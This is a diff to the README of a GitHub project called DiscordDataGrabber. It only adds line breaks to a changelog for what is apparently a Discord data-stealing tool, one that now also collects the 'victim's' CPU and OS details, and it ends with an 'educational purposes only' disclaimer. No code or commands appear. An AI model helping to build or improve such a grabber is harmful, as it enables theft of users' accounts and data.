Zeczero/DiscordDataGrabber/README.md

 PGP: [0x73D6849A](https://gist.github.com/Zeczero/908edd725cf297366e0f30c82958901d)

 ### ⚠️ Update 2021
-✅ Fixed various bugs related to the functionality of this program ✅ Corrected the structure of a code
+✅ Fixed various bugs related to the functionality of this program<br/>
+✅ Corrected the structure of a code<br/>
-✅ Rewrote it in more object-oriented way
+✅ Rewrote it in more object-oriented way<br/>
-✅ Improved the performance
+✅ Improved the performance<br/>
-✅ Included CPU/OS information of the victim
+✅ Included CPU/OS information of the victim<br/>

 This is made for educational purposes only.